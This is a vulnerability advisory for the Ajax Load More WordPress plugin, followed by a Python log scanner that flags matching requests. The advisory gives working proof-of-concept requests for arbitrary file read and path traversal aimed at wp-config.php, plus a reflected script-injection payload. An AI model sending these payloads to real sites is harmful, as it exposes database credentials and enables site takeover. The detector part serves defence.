The "ajax-load-more-repeaters" AJAX action is vulnerable to full path disclosure, since the full server-side path of the file appears in the request, and an arbitrary file name can be supplied through the "alm_repeaters_export" parameter to read that file's contents. PoC for reading the WordPress configuration file:
POST /wp-admin/admin.php?page=ajax-load-more-repeaters
alm_repeaters_export=/var/www/html/wp-config.php
Vulnerable file: admin/admin.php
The "index" parameter of the "alm_get_tax_terms" action is not properly sanitized; the PoC below reflects a script tag through it. PoC:
/wp-admin/admin-ajax.php?action=alm_get_tax_terms&taxonomy=post_tag&index=1"><script>alert(1)</script>&nonce={nonce}
Vulnerable file: admin/admin.php
The "type" parameter of the "alm_get_layout" action accepts directory traversal sequences. PoC:
/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../../../wp-config.php&custom=true&alias=&nonce={nonce}
/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../wp-config&alias=&nonce={nonce}
Vulnerable file: admin/admin.php
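Added detection example (not part of the original advisory or the plugin's code): scans web-server access-log lines for the three request patterns described above. The log lines, client IPs and nonce values are constructed; the repeater export endpoint is only flagged for review, because its file name travels in the POST body, which access logs do not record.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, query strings kept).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../../../wp-config.php&custom=true&alias=&nonce=abcd HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=alm_get_tax_terms&taxonomy=post_tag&index=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E&nonce=abcd HTTP/1.1" 200 128
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=default&alias=&nonce=abcd HTTP/1.1" 200 640
10.0.0.8 - - [01/Jan/2024:10:00:04 +0000] "POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_request(target: str) -> Optional[str]:
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    # parse_qs percent-decodes values, so encoded payloads are compared decoded.
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if parts.path.endswith("/admin-ajax.php"):
        action = params.get("action", "")
        # alm_get_layout: 'type' should be a plain repeater name, never a path.
        if action == "alm_get_layout":
            t = params.get("type", "")
            if ".." in t or "/" in t or "\\" in t:
                return "alm_get_layout path traversal in 'type'"
        # alm_get_tax_terms: 'index' is expected to be a small integer.
        if action == "alm_get_tax_terms":
            if not params.get("index", "0").isdigit():
                return "alm_get_tax_terms non-numeric 'index' (possible XSS)"
    # Export page: the file name is in the POST body, so only flag for review.
    if parts.path.endswith("/admin.php") and params.get("page") == "ajax-load-more-repeaters":
        return "repeater export page hit (inspect POST body for alm_repeaters_export)"
    return None


def scan_log(text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, finding) pairs for every suspicious line in an access log."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = classify_request(m.group("target"))
        if finding:
            hits.append((line.split()[0], finding))
    return hits


if __name__ == "__main__":
    for ip, finding in scan_log(SAMPLE_LOG):
        print(f"{ip}: {finding}")
```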